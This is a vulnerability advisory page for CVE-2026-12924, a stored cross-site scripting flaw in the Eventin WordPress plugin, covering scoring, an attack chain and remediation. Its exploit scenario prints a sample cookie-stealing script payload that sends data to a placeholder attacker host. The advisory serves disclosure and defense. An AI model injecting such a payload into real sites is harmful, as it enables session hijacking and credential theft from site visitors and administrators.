Skip to main content

Eventin CVE-2026-12924

| EUVDEUVD-2026-42843 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-10 Wordfence GHSA-j2h9-v293-4vf9
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
6.4 MEDIUM

Network-delivered stored XSS (AV:N/AC:L) requires contributor-level WordPress account (PR:L); payload executes cross-context in victims' browsers (S:C); no availability impact.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 10, 2026 - 09:20 vuln.today
CVE Published
Jul 10, 2026 - 07:48 cve.org
MEDIUM 6.4

DescriptionCVE.org

The Eventin - Event Calendar, Event Registration, Tickets & Booking (AI Powered) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'etn_faq_content' parameter in all versions up to, and including, 4.1.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored cross-site scripting in the Eventin WordPress event management plugin (all versions through 4.1.15) lets any contributor-level user permanently embed malicious JavaScript in event FAQ sections via the unescaped etn_faq_content parameter. The CVSS scope change (S:C) confirms the impact crosses the attacker's security context - injected scripts execute in any visitor's browser who loads the affected event page, enabling session hijacking or credential harvesting of higher-privileged users including site administrators. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain contributor-level WordPress credentials
Delivery
Submit malicious JavaScript via etn_faq_content in event FAQ editor
Exploit
Payload stored unescaped in database
Execution
Victim browses to affected public event page
Persist
Script executes in victim browser
Impact
Exfiltrate session cookies to attacker-controlled server

Vulnerability AssessmentAI

Exploitation Requires an authenticated WordPress session with at minimum contributor-level role on the target site - typically the 'Contributor', 'Author', 'Editor', or 'Administrator' WordPress roles can create or edit event posts via the Eventin plugin. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 6.4 score reflects a moderate-severity stored XSS with scope change. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with a WordPress contributor account navigates to the event editor and submits a crafted payload such as `<script>fetch('https://attacker.example/steal?c='+document.cookie)</script>` in the `etn_faq_content` field of an event's FAQ section. The payload is stored without sanitization and rendered without output escaping in the event detail templates. …
Remediation Upstream fix available via WordPress SVN changeset revision 3600977 (https://plugins.trac.wordpress.org/changeset?reponame=&old=3600977%40wp-event-solution&new=3600977%40wp-event-solution); however, the exact patched release version number is not confirmed from the available data - update to the latest version in the WordPress plugin directory and verify the installed version exceeds 4.1.15. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-12924 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy